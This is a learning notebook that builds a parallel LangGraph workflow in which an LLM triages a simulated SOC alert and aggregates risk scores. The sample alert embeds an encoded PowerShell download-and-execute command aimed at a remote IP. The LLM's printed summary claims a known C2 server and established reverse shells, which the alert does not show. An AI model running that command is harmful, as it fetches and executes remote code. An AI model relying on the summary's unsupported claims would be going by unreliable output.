## AI SOC Triage – Parallel Workflow (Learning Version)

This notebook demonstrates a simple parallel AI investigation workflow 
using LangGraph and structured LLM outputs.

The goal is to understand:
- State management
- Parallel nodes (fan-out)
- Aggregation (fan-in)
- Structured response modeling


In [1]:
from langgraph.graph import StateGraph, START, END
from langchain_groq import ChatGroq
from typing import TypedDict, Annotated
from pydantic import BaseModel, Field
from dotenv import load_dotenv
import operator
import os

In [2]:
load_dotenv()

True

In [3]:
model = ChatGroq(
    model="qwen/qwen3-32b",
    api_key=os.getenv("GROQ_API_KEY"),
    temperature=0.1
)
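`os.getenv` returns `None` when `GROQ_API_KEY` is missing, so a misconfigured `.env` file tends to show up later as a less obvious error. A minimal fail-fast check could look like the sketch below. `require_env` is a hypothetical helper, not part of `python-dotenv` or `langchain_groq`.

```python
import os

def require_env(name: str) -> str:
    """Return the environment variable `name`, failing fast if it is unset or empty."""
    value = os.getenv(name)
    if not value:
        raise RuntimeError(f"{name} is not set; add it to your .env file or environment")
    return value
```

With it, the model cell would pass `api_key=require_env("GROQ_API_KEY")` instead of calling `os.getenv` directly.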

### Define Structured Output Schema

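We use Pydantic to enforce structured LLM responses.

Each investigation node returns:
- Findings: a detailed analysis focused on that node's domain
- Risk score: a number from 0 to 10 (10 = critical)

Because every node returns the same two fields and the score is range-checked, the outputs are consistent and easy to aggregate.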


In [4]:
class SecuritySchema(BaseModel):
    findings: str = Field(description="Detailed security analysis of the specific domain")
    risk_score: float = Field(description="Risk score from 0 to 10 (10 being critical)", ge=0, le=10)
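The `ge=0` and `le=10` constraints are checked by Pydantic whenever a `SecuritySchema` instance is built, so an out-of-range score is rejected rather than silently aggregated. The sketch below redefines the schema so it runs standalone; `accepts_score` is a hypothetical helper used only for illustration.

```python
from pydantic import BaseModel, Field, ValidationError

class SecuritySchema(BaseModel):
    findings: str = Field(description="Detailed security analysis of the specific domain")
    risk_score: float = Field(description="Risk score from 0 to 10 (10 being critical)", ge=0, le=10)

def accepts_score(score: float) -> bool:
    """Return True if Pydantic accepts `score` as a risk_score, False if validation fails."""
    try:
        SecuritySchema(findings="example finding", risk_score=score)
        return True
    except ValidationError:
        return False

# Both bounds are inclusive: 0 and 10 pass, values outside the range fail
for candidate in (0, 8.5, 10, 10.5, -1):
    print(candidate, accepts_score(candidate))
```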

In [5]:
structured_model = model.with_structured_output(SecuritySchema)

In [6]:
# The "Incident" Data (Simulating a SIEM Alert)
alert_data = """
ALERT: Suspicious PowerShell Execution
Timestamp: 2024-05-20T14:22:01Z
Host: FIN-SRV-04 (Finance Department File Server)
User: svc_backup
Process: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTAzLjU1LjIuMTgvc2hlbGwucHMnKQ==
Parent Process: cmd.exe
Location: C:\\Windows\\Temp\\
"""

### Define Shared Workflow State

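The state object holds:

- The alert being investigated
- One report per investigation node (threat intel, asset context, behavioral)
- The individual risk scores from each node
- The aggregated severity index
- The final summary

All nodes read from and write to this shared state, and each node returns only the keys it updates. `individual_score` is annotated with `operator.add`, so the scores written by the parallel nodes are concatenated rather than overwriting one another.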


In [7]:
class SOCState(TypedDict):
    alert: str
    threat_intel_report: str
    asset_context_report: str
    behavioral_report: str
    final_summary: str
    # Reducer: each parallel node appends its score instead of replacing the list
    individual_score: Annotated[list[float], operator.add]
    severity_index: float
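The `operator.add` annotation tells LangGraph how to combine several writes to `individual_score` within one step; without a reducer, LangGraph rejects concurrent writes to the same key with an error (`InvalidUpdateError`). The plain-Python sketch below mimics the merge: each node contributes a one-element list, and folding the lists with `operator.add` concatenates them. The scores are made-up example values, and `merge_scores` is illustrative, not LangGraph's implementation.

```python
import operator
from functools import reduce

# Partial updates as the three investigation nodes might return them in one step
# (report text and scores are made-up example values)
updates = [
    {"threat_intel_report": "IoC review", "individual_score": [9.0]},
    {"asset_context_report": "Asset review", "individual_score": [8.0]},
    {"behavioral_report": "TTP review", "individual_score": [8.5]},
]

def merge_scores(current: list[float], updates: list[dict]) -> list[float]:
    """Fold each update's score list into `current` using operator.add (list concatenation)."""
    return reduce(operator.add, (u["individual_score"] for u in updates), current)

print(merge_scores([], updates))  # [9.0, 8.0, 8.5]
```

Because the mean computed later does not depend on order, it does not matter which branch's score lands first.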

### Parallel Investigation Nodes (Fan-Out)

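We define three independent investigation functions:

- Threat intelligence analysis
- Asset context analysis
- Behavioral analysis

Each node:
- Receives the alert from the shared state
- Calls the structured LLM with a domain-specific prompt
- Returns a partial state update: its own report field plus a one-element list holding its risk score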
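LangGraph schedules the three branches in the same step, which matters because each one spends most of its time waiting on a network call to the LLM. The sketch below is a plain-Python analogue of that fan-out / fan-in built on `concurrent.futures.ThreadPoolExecutor`, not LangGraph's own scheduler; the branches produced by the hypothetical `make_branch` sleep instead of calling a model.

```python
import time
from concurrent.futures import ThreadPoolExecutor

def make_branch(report_key: str, score: float, delay: float = 0.2):
    """Hypothetical stand-in for an LLM-backed node: sleeps, then returns a partial update."""
    def branch(state: dict) -> dict:
        time.sleep(delay)  # simulates waiting on the LLM API
        return {report_key: f"analysis of: {state['alert']}", "individual_score": [score]}
    return branch

branches = [
    make_branch("threat_intel_report", 9.0),
    make_branch("asset_context_report", 8.0),
    make_branch("behavioral_report", 8.5),
]

def fan_out_fan_in(state: dict, branches) -> dict:
    # Fan-out: every branch receives the same input state and runs in its own thread
    with ThreadPoolExecutor(max_workers=len(branches)) as pool:
        updates = list(pool.map(lambda branch: branch(state), branches))
    # Fan-in: overwrite report keys, concatenate score lists (like the operator.add reducer)
    merged = {**state, "individual_score": list(state.get("individual_score", []))}
    for update in updates:
        for key, value in update.items():
            if key == "individual_score":
                merged[key] += value
            else:
                merged[key] = value
    return merged

start = time.perf_counter()
demo_result = fan_out_fan_in({"alert": "Suspicious PowerShell Execution"}, branches)
elapsed = time.perf_counter() - start
print(demo_result["individual_score"], f"{elapsed:.2f}s")
```

Run one after another, the three 0.2 s waits would take about 0.6 s; run concurrently they take roughly 0.2 s.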


In [8]:
def investigate_threat_intel(state: SOCState):
    """Checks the indicators (IPs, Commands, Hashes) for known malicious patterns."""
    prompt = f"Analyze the following alert specifically for Indicators of Compromise (IoCs) and network-based threats: \n {state['alert']}"
    output = structured_model.invoke(prompt)
    return {'threat_intel_report': output.findings, 'individual_score': [output.risk_score]}

def analyze_asset_context(state: SOCState):
    """Analyzes the importance of the host and user involved."""
    prompt = f"Analyze the following alert focusing on Asset Criticality and User Permissions. Is this a sensitive target? \n {state['alert']}"
    output = structured_model.invoke(prompt)
    return {'asset_context_report': output.findings, 'individual_score': [output.risk_score]}

def investigate_behavior(state: SOCState):
    """Analyzes the 'TTPs' (Tactics, Techniques and Procedures) using MITRE ATT&K logic."""
    prompt = f"Analyze the behavior in this alert. Does this look like typical system activity or an attack pattern (e.g. Living off the Land)? \n {state['alert']}"
    output = structured_model.invoke(prompt)
    return {'behavioral_report': output.findings, 'individual_score': [output.risk_score]}
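The three node functions differ only in their prompt and in the report key they write. A hypothetical factory, `make_investigator`, could build them from those two values, and injecting the model also makes the nodes testable offline. `StubModel` and `Assessment` are illustrative stand-ins for `structured_model` and `SecuritySchema`; in the notebook you would pass `structured_model` itself.

```python
from dataclasses import dataclass, field
from typing import Callable

@dataclass
class Assessment:
    """Hypothetical stand-in for SecuritySchema (findings + risk_score)."""
    findings: str
    risk_score: float

@dataclass
class StubModel:
    """Hypothetical offline model: records prompts and returns a fixed score."""
    score: float
    prompts: list[str] = field(default_factory=list)

    def invoke(self, prompt: str) -> Assessment:
        self.prompts.append(prompt)
        return Assessment(findings=f"stub findings for a {len(prompt)}-char prompt", risk_score=self.score)

def make_investigator(report_key: str, instruction: str, model) -> Callable[[dict], dict]:
    """Build a node that prompts `model` with `instruction` plus the alert and writes
    its findings to `report_key` and its score to `individual_score`."""
    def node(state: dict) -> dict:
        output = model.invoke(f"{instruction} \n {state['alert']}")
        return {report_key: output.findings, "individual_score": [output.risk_score]}
    return node

threat_node = make_investigator(
    "threat_intel_report",
    "Analyze the following alert specifically for Indicators of Compromise (IoCs) and network-based threats:",
    StubModel(score=9.0),
)
print(threat_node({"alert": "ALERT: Suspicious PowerShell Execution"}))
```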


### Risk Aggregation (Fan-In)

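After all three parallel investigations complete:

- The `operator.add` reducer has already collected the three scores in `individual_score`
- The scores are averaged (unweighted mean) into `severity_index`
- The LLM synthesizes the three reports into an executive summary with recommended response steps

This step merges the three perspectives into a single score and a single recommendation.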


In [9]:
def final_disposition(state: SOCState):
    """Synthesizes the findings into a SOC Manager's report."""
    prompt = (
        f"Based on these three reports, provide a final executive summary and recommended response steps. \n"
        f"Threat Intel: {state['threat_intel_report']}\n"
        f"Asset Context: {state['asset_context_report']}\n"
        f"Behavioral Analysis: {state['behavioral_report']}"
    )
    # Plain (unstructured) call: the summary is free text and may include <think> tags
    overall_report = model.invoke(prompt).content
    # Severity index = unweighted mean of the node scores collected by the reducer
    avg_score = sum(state['individual_score'])/len(state['individual_score'])

    return {'final_summary': overall_report, 'severity_index': avg_score}
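`final_disposition` uses an unweighted mean. With hypothetical scores of 9.5, 8.0, and 4.0, the mean is 21.5 / 3 ≈ 7.17, so one low-scoring branch pulls the index down even though another rated the alert near-critical. A common alternative, not what this notebook does, is to report the maximum alongside the mean. The hypothetical `severity_summary` helper below computes both; its empty-list guard is defensive, since this graph always produces three scores.

```python
from statistics import fmean

def severity_summary(scores: list[float]) -> dict[str, float]:
    """Return the unweighted mean (as in final_disposition) and the peak score."""
    if not scores:
        raise ValueError("no individual scores to aggregate")
    return {"mean": round(fmean(scores), 2), "max": max(scores)}

print(severity_summary([9.5, 8.0, 4.0]))  # {'mean': 7.17, 'max': 9.5}
```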

### Build the LangGraph Workflow

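We construct a `StateGraph` over `SOCState`:

- Three edges from `START`, one to each investigation node (fan-out)
- Three edges from those nodes into `final_disposition` (fan-in)
- An edge from `final_disposition` to `END`

Compiling the graph produces a runnable workflow that follows this execution flow.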


In [10]:
graph = StateGraph(SOCState)

# Add Nodes
graph.add_node('threat_intel', investigate_threat_intel)
graph.add_node('asset_context', analyze_asset_context)
graph.add_node('behavioral', investigate_behavior)
graph.add_node('final_disposition', final_disposition)

# Define Parallel Edges (Fan-Out)
graph.add_edge(START, 'threat_intel')
graph.add_edge(START, 'asset_context')
graph.add_edge(START, 'behavioral')

# Define Fan-In
graph.add_edge('threat_intel', 'final_disposition')
graph.add_edge('asset_context', 'final_disposition')
graph.add_edge('behavioral', 'final_disposition')

graph.add_edge('final_disposition', END)

# Compile the Graph
workflow = graph.compile()
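LangGraph executes a graph in discrete steps: nodes triggered in the same step run together, and a node is triggered in the next step when a node with an edge into it finishes. The sketch below is a simplified, hypothetical model of that rule (`supersteps` is not a LangGraph function). It shows why `final_disposition` runs once here, since all three branches finish in the same step, and why it would run twice if one branch were longer (`ioc_enrich` is a made-up extra node). For uneven branches, LangGraph's `add_edge` also accepts a list of start nodes, e.g. `graph.add_edge(['threat_intel', 'asset_context', 'behavioral'], 'final_disposition')`, which waits for all of them.

```python
from collections import defaultdict

# Names chosen so they do not shadow langgraph's START / END imports
START_NODE, END_NODE = "__start__", "__end__"

def supersteps(edges: list[tuple[str, str]], max_steps: int = 20) -> list[list[str]]:
    """Simplified trigger model: a node runs in step k+1 if any node with an edge
    into it ran in step k. Returns the (sorted) nodes that run in each step."""
    successors = defaultdict(set)
    for src, dst in edges:
        successors[src].add(dst)
    steps: list[list[str]] = []
    frontier = set(successors[START_NODE])
    while frontier - {END_NODE} and len(steps) < max_steps:
        running = frontier - {END_NODE}
        steps.append(sorted(running))
        frontier = set().union(*(successors[node] for node in running))
    return steps

branches_in = [(START_NODE, n) for n in ("threat_intel", "asset_context", "behavioral")]
notebook_edges = branches_in + [
    ("threat_intel", "final_disposition"),
    ("asset_context", "final_disposition"),
    ("behavioral", "final_disposition"),
    ("final_disposition", END_NODE),
]
print(supersteps(notebook_edges))
# [['asset_context', 'behavioral', 'threat_intel'], ['final_disposition']]

# Hypothetical extra step on one branch: threat_intel -> ioc_enrich -> final_disposition
uneven_edges = branches_in + [
    ("threat_intel", "ioc_enrich"),
    ("ioc_enrich", "final_disposition"),
    ("asset_context", "final_disposition"),
    ("behavioral", "final_disposition"),
    ("final_disposition", END_NODE),
]
print(supersteps(uneven_edges))
# [['asset_context', 'behavioral', 'threat_intel'], ['final_disposition', 'ioc_enrich'], ['final_disposition']]
```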

In [11]:
print(workflow.get_graph().draw_ascii())

                            +-----------+                              
                            | __start__ |*                             
                        ****+-----------+ ****                         
                    ****           *          *****                    
                ****               *               ****                
             ***                   *                   ***             
+---------------+           +------------+           +--------------+  
| asset_context |           | behavioral |           | threat_intel |  
+---------------+***        +------------+         **+--------------+  
                    ****           *          *****                    
                        ****       *      ****                         
                            ***    *   ***                             
                        +-------------------+                          
                        | final_disposition |                   

### Execute the Workflow

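We pass the sample alert as the initial state and run the graph. Only `alert` needs to be supplied; the nodes fill in every other key.

The returned state includes:
- The three individual investigation reports and their risk scores
- The aggregated severity index
- The final summary produced by `final_disposition`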


In [12]:
initial_state = {'alert': alert_data}

result = workflow.invoke(initial_state)

In [13]:
print(f"--- FINAL SEVERITY INDEX: {result['severity_index']}/10 ---\n")

final_report = result['final_summary']

# Qwen3 may prefix its answer with a <think>...</think> reasoning block; keep only the text after it
if "</think>" in final_report:
    final_report = final_report.split("</think>")[-1].strip()

print(final_report)

--- FINAL SEVERITY INDEX: 8.5/10 ---

**Executive Summary**  
The Finance Department File Server (FIN-SRV-04), a high-criticality asset handling sensitive financial data, has been compromised through a sophisticated attack leveraging PowerShell-based techniques. Key indicators include:  
1. **Malicious PowerShell Execution**: A suspicious command decoded to download and execute a remote script from a known malicious C2 server (IP: 103.55.2.18), bypassing security policies and using obfuscation.  
2. **Privileged Account Abuse**: The attack exploited the elevated privileges of the service account `svc_backup`, a high-value target for lateral movement or data exfiltration.  
3. **Stealthy Tactics**: Use of temporary directories (`C:\Windows\Temp\`) and hidden windows suggests an attempt to evade detection.  
4. **Network Risks**: Established reverse shell connections and potential lateral movement from the compromised finance server pose immediate threats to data integrity and confidenti

### Learning Reflection

This notebook demonstrates:

- How to orchestrate LLM calls using LangGraph
- How to structure outputs with Pydantic
- How to implement parallel fan-out / fan-in workflows
- How to compute a simple risk aggregation score

This is a learning-focused implementation designed for clarity,
not production optimization.
